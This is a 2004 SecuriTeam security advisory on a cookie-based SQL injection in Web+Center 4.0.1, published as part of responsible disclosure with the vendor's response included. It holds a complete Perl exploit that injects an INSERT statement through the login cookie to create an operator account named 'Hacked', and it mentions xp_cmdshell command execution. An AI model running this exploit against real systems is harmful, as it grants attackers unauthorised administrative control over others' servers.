[NT] Internet Software Sciences's Web+Center SQL Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 07/21/04

    To: list@securiteam.com
    Date: 21 Jul 2004 18:28:46 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Internet Software Sciences's Web+Center SQL Injection

    SUMMARY

    Internet Software Sciences's Web+Center is "A suite of web based customer
    support applications including:
     * Customer+Center
     * Tech+Center
     * Business+Center
     * Pocket+Center".

    The Web+Center does a good job of filtering out malicious content from
    incoming user provided data (given via GET and POST requests), however
    neglects to verify whether malicious data is entered via the Cookie
    object. Due to this at least one exploitable SQL Injection vulnerability
    that would allow an anonymous user to at the very least gain
    administrative privileges to the Internet Software Sciences's Web+Center
    product, at the worst case he will be able to get complete control over
    (administrative privileges) the computer on which the Internet Software
    Sciences's Web+Center is installed and utilize it to gain access to other
    computers.

    DETAILS

    Vulnerable Systems:
     * Internet Software Sciences's Web+Center version 4.0.1

    As a lot of pages use the Cookie object, but some require a user to logon
    prior to been able to access the page, we have chosen to show the
    vulnerability via the search.asp page found under the tech40 directory.

    Other directories also contain such vulnerable pages, customer40's
    DoCustomerOptions.asp one such example.

    If we insert a malicious SQL statement to the Cookie object, we can modify
    the 'tech_staff' table, and add a new user that will have the permissions
    of as an operator (tech_level 6).

    Depending on what other information is stored on the SQL server, and how
    it was hardened we could obtain:
    1) SQL's administrative username and password
    2) Execute commands via MS SQL's extended procedure (xp_cmdshell)
    3) Trick users into downloading Trojan horses (by providing them with
    solutions for their Tickets) etc.

    See the below exploit code demonstrating how we gain administrative
    privileges to Internet Software Sciences's Web+Center, no special
    information is required beside the hostname, and the path under which the
    search.asp page can be located.

    Vendor response:
    Our engineers has reviewed the security vulnerability and we are working
    on a updated version of our cookie tech check code that will be
    implemented in our next version. We had already planned to implement a
    more modularized version of the tech security code, so it will be easy to
    check for SQL injection strings in this new modularized code. Thanks for
    pointing this out and to making our product more secure.

    Testing Methodology:
    A few months ago Beyond Security built a new module for its Automated
    Scanning Vulnerability Assessment engine to test web sites and web
    applications for security vulnerabilities. This module adds the capability
    to dynamically crawl through a web site and find vulnerabilities in its
    dynamic pages.

    This type of tool was considered to be different from the network VA
    tools, but we at Beyond Security believe that these two types of tools
    should be merged into one, and this is what made us incorporate the Web
    Site Security Audit module to our Automated Scanning engine.

    For a press release on this integration see:
    <http://www.beyondsecurity.com/press/2004/press10030402.htm>
    http://www.beyondsecurity.com/press/2004/press10030402.htm
    White paper on the first integrated network and web application
    vulnerability scanner: <http://www.beyondsecurity.com/webscan-wp.pdf>
    http://www.beyondsecurity.com/webscan-wp.pdf

    Our Automated Scanning engine equipped with the Web Site Security Audit
    module did all the tests described in this advisory automatically.

    Exploit:
    #!/usr/bin/perl

    use IO::Socket;
    use strict;

    my $host = $ARGV[0];
    my $Path = $ARGV[1];

    if (($#ARGV+1) < 2)
    {
     print "iss_helpdesk.pl host path\n";
     exit(0);
    }

    my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
    PeerPort => "80" );

    unless ($remote) { die "cannot connect to http daemon on $host" }

    my $sql = "; INSERT INTO tech_staff (tech_id, tech_password, tech_level,
    first_name, last_name, availability, show_dispatch_flag) VALUES ('Hacked',
    'Hacked', 6, 'Hacked', 'Hacked', 1, 1); --";

    $sql =~s/([^a-zA-Z0-9])/uc sprintf("%%%02x",ord($1))/eg;

    my $http = "GET /$Path/search.asp HTTP/1.1
    Host: $host
    Accept-Encoding: gzip,deflate
    Connection: close
    Cookie: ISS_TECH_CENTER_LOGIN='+$sql;

    ";

    print "HTTP: [$http]\n";
    print $remote $http;
    sleep(1);

    while ()
    {
    # print $_;
    }
    print "\n";

    close($remote);

    print "You can now logon using the tech username 'Hacked' with the
    password 'Hacked'\n";

    exit(0);

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:expert@securiteam.com> Noam
    Rathaus.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    • [NT] Cumulative Security Update for Internet Explorer (MS06-013)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... Microsoft Internet Explorer allow attackers to execute arbitrary code, ... A remote code execution vulnerability exists in the way Internet Explorer ...
      (Securiteam)
    • [NT] Cumulative Security Update for Internet Explorer (MS04-038)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ...
      (Securiteam)
    • [NT] Cumulative Security Update for Internet Explorer (MS05-038)
      (Securiteam)
    • [NT] Cumulative Security Update for Internet Explorer (MS06-021)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... Improper memory and user input handling with Internet Explorer allows ... A remote code execution vulnerability exists in the way Internet Explorer ...
      (Securiteam)
    • [NT] Vulnerability in Microsoft Agent Allows Code Execution (MS07-051)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... A remote code execution vulnerability exists in Microsoft Agent in the way ... Internet Explorer by setting the kill bit for the control in the registry. ...
      (Securiteam)